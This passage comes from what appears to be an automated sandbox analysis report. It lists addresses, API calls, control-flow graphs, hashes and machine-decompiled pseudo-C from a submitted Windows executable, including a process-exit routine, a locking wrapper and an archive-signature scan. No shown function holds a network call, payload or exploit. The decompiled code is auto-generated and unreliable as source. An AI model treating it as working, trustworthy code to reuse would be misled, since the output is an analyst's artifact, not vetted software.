                              0x00401bd8
                              0x00401bdc
                              0x00401bdf
                              0x00000000
                              0x00401be1
                              0x00401be7
                              0x00401bec
                              0x00401bec
                              0x00401bed
                              0x00401bb6
                              0x00401bba
                              0x00401bbc
                              0x00401bbc
                              0x00000000
                              0x00401bbc
                              0x00000000
                              0x00401bb6
                              0x00401bdf
                              0x00401bd6
                              0x00000000
                              0x00401bf0
                              0x00401bf0
                              0x00401bf5
                              0x00000000
                              0x00401bf7
                              0x00401bf7
                              0x00401bfe
                              0x00401c03
                              0x00401c08
                              0x00000000
                              0x00401c0a
                              0x00401c0a
                              0x00401c0d
                              0x00401c10
                              0x00000000
                              0x00401c10
                              0x00000000
                              0x00401c08
                              0x00000000
                              0x00401bf5
                              0x00401bb6
                              0x00401c5c
                              0x00401c5c
                              0x00401c63
                              0x00401c68
                              0x00000000
                              0x00401c6a
                              0x00401c5a
                              0x00401c5a
                              0x00000000
                              0x00401b30
                              0x00401b30
                              0x00401b37
                              0x00401b3c
                              0x00401b3c
                              0x00401c6b
                              0x00401c70
                              0x00401c78

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: KA$KA
                              • API String ID: 3519838083-594506476
                              • Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
                              • Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00416CB8 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1074 416cb8-416cc7 call 416d5d 1077 416cc9-416cd4 GetCurrentProcess TerminateProcess 1074->1077 1078 416cda-416cf0 1074->1078 1077->1078 1079 416cf2-416cf9 1078->1079 1080 416d2e-416d42 call 416d6f 1078->1080 1082 416cfb-416d07 1079->1082 1083 416d1d-416d2d call 416d6f 1079->1083 1089 416d44-416d4a call 416d66 1080->1089 1090 416d4b-416d55 ExitProcess 1080->1090 1086 416d09-416d0d 1082->1086 1087 416d1c 1082->1087 1083->1080 1091 416d11-416d1a 1086->1091 1092 416d0f 1086->1092 1087->1083 1091->1086 1091->1087 1092->1091
                              C-Code - Quality: 80%
                              			E00416CB8(void* __esi, int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E00416D5D();
				_t23 = 1;
				_t27 =  *0x423400 - _t23; // 0x1
				if(_t27 == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				_t16 = _a12;
				 *0x4233fc = _t23;
				 *0x4233f8 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x425a10; // 0x5204c8
					if(_t9 != 0) {
						_t22 =  *0x425a0c; // 0x5204d0
						_push(_t24);
						_t4 = _t22 - 4; // 0x5204cc
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x425a10; // 0x5204c8
							} while (_t32 >= 0);
						}
					}
					E00416D6F(0x420044, 0x420048);
				}
				E00416D6F(0x42004c, 0x420054);
				if(_t16 == 0) {
					 *0x423400 = _t23; // executed
					ExitProcess(_a4);
				}
				return E00416D66();
			}












                              0x00416cb8
                              0x00416cb9
                              0x00416cc0
                              0x00416cc1
                              0x00416cc7
                              0x00416cd4
                              0x00416cd4
                              0x00416ce0
                              0x00416ce4
                              0x00416cea
                              0x00416cf0
                              0x00416cf2
                              0x00416cf9
                              0x00416cfb
                              0x00416d01
                              0x00416d02
                              0x00416d02
                              0x00416d07
                              0x00416d09
                              0x00416d09
                              0x00416d0d
                              0x00416d0f
                              0x00416d0f
                              0x00416d11
                              0x00416d14
                              0x00416d14
                              0x00416d09
                              0x00416d1c
                              0x00416d27
                              0x00416d2d
                              0x00416d38
                              0x00416d42
                              0x00416d4f
                              0x00416d55
                              0x00416d55
                              0x00416d4a

                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CCD
                              • TerminateProcess.KERNEL32(00000000,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CD4
                              • ExitProcess.KERNEL32 ref: 00416D55
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction ID: 207b1b8771569bb39d21ff3be241c2a042127402aedffa1bc22b33ac5a943006
                              • Opcode Fuzzy Hash: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction Fuzzy Hash: 7A01C4323002119BD630AF69FC86A9A7BA5FB41715BA2802FF45057151DB7CD8C28B5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00407093 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1095 407093-4070c7 call 413954 EnterCriticalSection call 4065b2 1099 4070c9-4070d7 call 406505 1095->1099 1100 4070da-4070f2 LeaveCriticalSection 1095->1100 1099->1100
                              C-Code - Quality: 100%
                              			E00407093(intOrPtr* __ecx) {
				intOrPtr* _t15;
				void* _t16;
				void* _t22;
				struct _CRITICAL_SECTION* _t23;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t29;
				void* _t30;

				E00413954(E00419874, _t30);
				_t26 = __ecx;
				_t23 = __ecx + 4;
				 *(_t30 - 0x10) = _t23;
				EnterCriticalSection(_t23);
				_t15 =  *_t26;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
				if(_t16 == 0) {
					_t29 =  *_t26;
					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
				}
				LeaveCriticalSection(_t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}











                              0x00407098
                              0x0040709f
                              0x004070a2
                              0x004070a6
                              0x004070a9
                              0x004070af
                              0x004070b5
                              0x004070c2
                              0x004070c7
                              0x004070cc
                              0x004070d7
                              0x004070d7
                              0x004070dd
                              0x004070ea
                              0x004070f2

                              APIs
                              • __EH_prolog.LIBCMT ref: 00407098
                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070A9
                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070DD
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction ID: a56bdc6fde0de93627b634a906b5586fd045a2fb55df8f4462ae58feb39c4b8d
                              • Opcode Fuzzy Hash: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction Fuzzy Hash: D7018176A00204EFCB118F94CC08B9ABBB5FF48715F00841AFD12E7250C3B4A910CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040DD8B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1103 40dd8b-40ddb0 call 413954 call 40776f 1108 40ddb6-40ddbf call 40df2c 1103->1108 1109 40df1b-40df29 1103->1109 1112 40ddc1-40ddc3 1108->1112 1113 40ddc8-40ddfe call 4076d5 call 414090 1108->1113 1112->1109 1118 40de01-40de06 1113->1118 1119 40de25-40de47 call 406505 1118->1119 1120 40de08-40de15 1118->1120 1127 40df07 1119->1127 1128 40de4d-40de55 1119->1128 1121 40decb-40dece 1120->1121 1122 40de1b 1120->1122 1123 40df09-40df19 call 403a9c 1121->1123 1122->1119 1124 40de1d-40de1f 1122->1124 1123->1109 1124->1119 1124->1121 1127->1123 1128->1121 1130 40de57-40de5b 1128->1130 1130->1119 1131 40de5d-40de6d 1130->1131 1132 40dec6-40dec9 1131->1132 1133 40de6f 1131->1133 1134 40deaa-40dec1 call 413980 1132->1134 1135 40de77 1133->1135 1134->1118 1136 40de7a-40de7e 1135->1136 1138 40de80-40de82 1136->1138 1139 40de8a 1136->1139 1141 40de84-40de88 1138->1141 1142 40de8c 1138->1142 1139->1142 1141->1136 1142->1134 1143 40de8e-40de97 call 40df2c 1142->1143 1146 40ded0-40df04 call 414090 call 4065b2 1143->1146 1147 40de99-40dea2 1143->1147 1146->1127 1149 40de71-40de74 1147->1149 1150 40dea4-40dea7 1147->1150 1149->1135 1150->1134
                              C-Code - Quality: 95%
                              			E0040DD8B(void* __ecx, void* __eflags) {
				intOrPtr _t57;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;

				E00413954(E0041A630, _t116);
				_t119 = _t118 - 0x20;
				_t113 = __ecx;
				_t83 = __ecx + 0x28;
				_t107 = 0x20;
				_t57 = E0040776F(__eflags, _t107); // executed
				if(_t57 == 0) {
					if(E0040DF2C(_t83) == 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
						 *((intOrPtr*)(_t116 - 0x28)) = 0;
						 *((intOrPtr*)(_t116 - 0x24)) = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						E004076D5(_t116 - 0x2c, 0x10000);
						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
						E00414090( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
						_t109 =  *((intOrPtr*)(_t113 + 0x20));
						_t85 =  *((intOrPtr*)(_t113 + 0x24));
						_t121 = _t119 + 0xc;
						while(1) {
							L4:
							_t100 =  *((intOrPtr*)(_t116 + 0xc));
							__eflags = _t100;
							if(_t100 == 0) {
								goto L8;
							}
							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
							asm("sbb eax, [esi+0x24]");
							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
							if(__eflags > 0) {
								L25:
								_t115 = 1;
							} else {
								if(__eflags < 0) {
									goto L8;
								} else {
									__eflags = _t95 -  *_t100;
									if(_t95 >  *_t100) {
										goto L25;
									} else {
										while(1) {
											L8:
											_t65 =  *((intOrPtr*)(_t116 - 0x10));
											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
											__eflags = _t67;
											if(_t67 != 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t116 - 0x20));
											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
											__eflags = _t69;
											if(_t69 == 0) {
												goto L25;
											} else {
												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
													continue;
												} else {
													_t104 = 0;
													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
													 *((intOrPtr*)(_t116 - 0x14)) = 0;
													__eflags = _t71;
													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
													if(_t71 <= 0) {
														_t93 =  *((intOrPtr*)(_t116 - 0x18));
														goto L23;
													} else {
														while(1) {
															_t93 =  *((intOrPtr*)(_t116 - 0x18));
															while(1) {
																L15:
																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
																if( *((char*)(_t104 + _t93)) == 0x37) {
																	break;
																}
																__eflags = _t104 - _t71;
																if(__eflags < 0) {
																	_t104 = _t104 + 1;
																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
																	continue;
																}
																L19:
																if(__eflags == 0) {
																	L23:
																	_t109 = _t109 + _t71;
																	asm("adc ebx, 0x0");
																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
																	E00413980(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
																	_t121 = _t121 + 0xc;
																	goto L4;
																} else {
																	_t75 = E0040DF2C(_t93 + _t104);
																	__eflags = _t75;
																	if(_t75 != 0) {
																		E00414090(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
																		_t80 =  *((intOrPtr*)(_t116 + 8));
																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
																		_t98 = 0;
																		asm("adc ebx, ecx");
																		_t111 = _t110 + 0x20;
																		__eflags = _t111;
																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
																		asm("adc ebx, ecx");
																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
																		goto L27;
																	} else {
																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			continue;
																		} else {
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			goto L23;
																		}
																	}
																}
																goto L28;
															}
															__eflags = _t104 - _t71;
															goto L19;
														}
													}
												}
											}
											goto L28;
										}
										L27:
										_t115 = _t67;
									}
								}
							}
							L28:
							 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
							E00403A9C( *((intOrPtr*)(_t116 - 0x24)));
							_t57 = _t115;
							goto L29;
						}
					} else {
						_t57 = 0;
					}
				}
				L29:
				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
				return _t57;
			}



























                              0x0040dd90
                              0x0040dd95
                              0x0040dd9b
                              0x0040dda2
                              0x0040dda5
                              0x0040dda9
                              0x0040ddb0
                              0x0040ddbf
                              0x0040ddc8
                              0x0040ddca
                              0x0040ddd1
                              0x0040ddd4
                              0x0040dddf
                              0x0040dde2
                              0x0040dded
                              0x0040ddf0
                              0x0040ddf3
                              0x0040ddf8
                              0x0040ddfb
                              0x0040ddfe
                              0x0040de01
                              0x0040de01
                              0x0040de01
                              0x0040de04
                              0x0040de06
                              0x00000000
                              0x00000000
                              0x0040de0c
                              0x0040de0f
                              0x0040de12
                              0x0040de15
                              0x0040decb
                              0x0040decd
                              0x0040de1b
                              0x0040de1b
                              0x00000000
                              0x0040de1d
                              0x0040de1d
                              0x0040de1f
                              0x00000000
                              0x0040de25
                              0x0040de25
                              0x0040de25
                              0x0040de33
                              0x0040de42
                              0x0040de45
                              0x0040de47
                              0x00000000
                              0x00000000
                              0x0040de4d
                              0x0040de50
                              0x0040de53
                              0x0040de55
                              0x00000000
                              0x0040de57
                              0x0040de57
                              0x0040de5b
                              0x00000000
                              0x0040de5d
                              0x0040de60
                              0x0040de62
                              0x0040de65
                              0x0040de68
                              0x0040de6a
                              0x0040de6d
                              0x0040dec6
                              0x00000000
                              0x0040de6f
                              0x0040de77
                              0x0040de77
                              0x0040de7a
                              0x0040de7a
                              0x0040de7a
                              0x0040de7e
                              0x00000000
                              0x00000000
                              0x0040de80
                              0x0040de82
                              0x0040de84
                              0x0040de85
                              0x00000000
                              0x0040de85
                              0x0040de8c
                              0x0040de8c
                              0x0040deaa
                              0x0040deaa
                              0x0040deac
                              0x0040deaf
                              0x0040deb9
                              0x0040debe
                              0x00000000
                              0x0040de8e
                              0x0040de90
                              0x0040de95
                              0x0040de97
                              0x0040dedf
                              0x0040dee7
                              0x0040deea
                              0x0040deef
                              0x0040def2
                              0x0040def3
                              0x0040def5
                              0x0040def5
                              0x0040def8
                              0x0040deff
                              0x0040df04
                              0x00000000
                              0x0040de99
                              0x0040de99
                              0x0040de9f
                              0x0040dea2
                              0x0040de71
                              0x0040de74
                              0x0040de77
                              0x00000000
                              0x0040dea4
                              0x0040dea4
                              0x0040dea7
                              0x00000000
                              0x0040dea7
                              0x0040dea2
                              0x0040de97
                              0x00000000
                              0x0040de8c
                              0x0040de8a
                              0x00000000
                              0x0040de8a
                              0x0040de77
                              0x0040de6d
                              0x0040de5b
                              0x00000000
                              0x0040de55
                              0x0040df07
                              0x0040df07
                              0x0040df07
                              0x0040de1f
                              0x0040de1b
                              0x0040df09
                              0x0040df0c
                              0x0040df13
                              0x0040df19
                              0x00000000
                              0x0040df19
                              0x0040ddc1
                              0x0040ddc1
                              0x0040ddc1
                              0x0040ddbf
                              0x0040df1b
                              0x0040df21
                              0x0040df29

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-3916222277
                              • Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
                              • Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403113 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1154 403113-40313f call 413954 call 402ee1 call 405841 1161 403141-403156 call 401d1b 1154->1161 1162 403158-40315d 1154->1162 1168 4031b9-4031c1 call 403a9c 1161->1168 1164 403167 1162->1164 1165 40315f-403165 1162->1165 1167 40316a-4031a9 call 4032a8 call 408f0a call 4042ad 1164->1167 1165->1167 1179 4031c6-4031e8 call 401ce1 call 405d0b call 4049dd 1167->1179 1180 4031ab-4031b4 call 401d1b 1167->1180 1174 403298 1168->1174 1176 403299-4032a7 1174->1176 1188 40322a-40327f call 401c80 call 402685 call 403a9c 1179->1188 1189 4031ea-403228 call 409569 call 401d7a call 403a9c * 3 1179->1189 1180->1168 1211 403281 call 40c231 1188->1211 1212 403281 call 40bbc9 1188->1212 1189->1176 1204 403284-403297 call 403a9c * 2 1204->1174 1211->1204 1212->1204
                              C-Code - Quality: 95%
                              			E00403113(intOrPtr* __ecx, void* __eflags) {
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				intOrPtr _t73;
				intOrPtr* _t82;
				void* _t85;
				void* _t87;
				void* _t121;
				void* _t124;
				intOrPtr _t126;
				intOrPtr* _t129;
				void* _t131;

				E00413954(E004192B0, _t131);
				_t129 = __ecx;
				E00402EE1(_t131 - 0x40);
				_push( *((intOrPtr*)(__ecx + 4)));
				 *((intOrPtr*)(_t131 - 4)) = 0;
				_t63 = E00405841(_t131 - 0x68, _t121); // executed
				if(_t63 != 0) {
					_t64 =  *((intOrPtr*)(__ecx + 0x1c));
					__eflags = _t64;
					if(_t64 == 0) {
						 *((intOrPtr*)(_t131 - 0x10)) = 0;
					} else {
						 *((intOrPtr*)(_t131 - 0x10)) = _t64 + 4;
					}
					E004032A8(_t131 - 0x30, 4);
					 *((intOrPtr*)(_t131 - 0x30)) = 0x41b378;
					_t126 = _t129 + 0x28;
					 *((char*)(_t131 - 4)) = 1;
					_t68 = E00408F0A(_t126,  *_t129, _t131 - 0x30, 0, 0, _t129 + 4,  *((intOrPtr*)(_t131 - 0x10))); // executed
					 *((intOrPtr*)(_t129 + 0x60)) = _t68;
					 *((char*)(_t131 - 4)) = 0;
					E004042AD(_t131 - 0x30);
					__eflags =  *((intOrPtr*)(_t129 + 0x60));
					if( *((intOrPtr*)(_t129 + 0x60)) == 0) {
						E00401CE1(_t131 - 0x1c, _t129 + 0x10);
						 *((char*)(_t131 - 4)) = 2;
						E00405D0B(_t131 - 0x1c);
						_t73 = E004049DD( *((intOrPtr*)(_t131 - 0x1c))); // executed
						__eflags = _t73;
						if(__eflags != 0) {
							E00401C80(_t131 - 0x28, L"Default");
							 *((char*)(_t131 - 4)) = 4;
							E00402685( *((intOrPtr*)(_t129 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4)))), _t131 - 0x1c, _t131 - 0x28, _t131 - 0x50, 0);
							 *((char*)(_t131 - 4)) = 2;
							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
							_t82 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4))));
							 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)( *_t82 + 0x1c))(_t82, 0, 0xffffffff, 0,  *((intOrPtr*)(_t129 + 0x20)));
							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
							goto L11;
						} else {
							_push(_t131 - 0x1c);
							_t124 = 9;
							_t87 = E00409569(_t131 - 0x28, _t124, __eflags);
							 *((char*)(_t131 - 4)) = 3;
							E00401D7A(_t129 + 0x64, _t87);
							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
							 *((intOrPtr*)(_t129 + 0x60)) = 0x80004005;
							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
						}
					} else {
						E00401D1B(_t129 + 0x64,  *0x420320);
						goto L7;
					}
				} else {
					E00401D1B(__ecx + 0x64,  *0x42031c);
					 *((intOrPtr*)(__ecx + 0x60)) = 0x80004005;
					L7:
					_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
					L11:
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t131 - 0xc));
				return _t85;
			}















                              0x00403118
                              0x00403122
                              0x00403128
                              0x0040312d
                              0x00403135
                              0x00403138
                              0x0040313f
                              0x00403158
                              0x0040315b
                              0x0040315d
                              0x00403167
                              0x0040315f
                              0x00403162
                              0x00403162
                              0x0040316f
                              0x00403174
                              0x00403181
                              0x00403184
                              0x00403193
                              0x0040319b
                              0x0040319e
                              0x004031a1
                              0x004031a6
                              0x004031a9
                              0x004031cd
                              0x004031d5
                              0x004031d9
                              0x004031e1
                              0x004031e6
                              0x004031e8
                              0x00403232
                              0x0040323e
                              0x00403258
                              0x00403260
                              0x00403264
                              0x00403279
                              0x00403287
                              0x0040328a
                              0x00403292
                              0x00000000
                              0x004031ea
                              0x004031f0
                              0x004031f3
                              0x004031f4
                              0x004031fd
                              0x00403201
                              0x00403209
                              0x00403211
                              0x00403218
                              0x00403220
                              0x00403225
                              0x004031ab
                              0x004031b4
                              0x00000000
                              0x004031b4
                              0x00403141
                              0x0040314a
                              0x0040314f
                              0x004031b9
                              0x004031bc
                              0x00403298
                              0x00403298
                              0x0040329f
                              0x004032a7

                              APIs
                              • __EH_prolog.LIBCMT ref: 00403118
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2
                                • Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: Default
                              • API String ID: 3519838083-753088835
                              • Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
                              • Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00402F15 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule

